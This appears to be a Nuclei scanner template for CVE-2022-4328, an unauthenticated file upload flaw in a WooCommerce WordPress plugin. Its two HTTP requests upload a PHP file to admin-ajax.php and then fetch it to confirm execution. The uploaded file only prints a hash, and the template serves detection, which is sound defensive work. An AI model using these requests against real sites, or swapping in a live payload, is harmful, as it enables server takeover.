65 lines
2.2 KiB
YAML
65 lines
2.2 KiB
YAML
id: CVE-2022-4328
|
|
|
|
info:
|
|
name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
|
|
remediation: Fixed in version 18.0
|
|
reference:
|
|
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
|
|
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-4328
|
|
cwe-id: CWE-434
|
|
epss-score: 0.85882
|
|
epss-percentile: 0.98209
|
|
cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: najeebmedia
|
|
product: woocommerce_checkout_field_manager
|
|
framework: wordpress
|
|
tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
|
|
|
|
--------------------------22728be7b3104597
|
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php echo md5("CVE-2022-4328"); ?>
|
|
|
|
--------------------------22728be7b3104597--
|
|
- |
|
|
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- fe5df26ce4ca0056ffae8854469c282f
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450221009c976dda2cb658ebc097e28392ad4e01f7246a9e8d32e938fda7269404310edc0220796432ff4156bc8eb3663646ca08d524198c84d223404f89a4cf4cf08be4611d:922c64590222798bb761d5b6d8e72950
|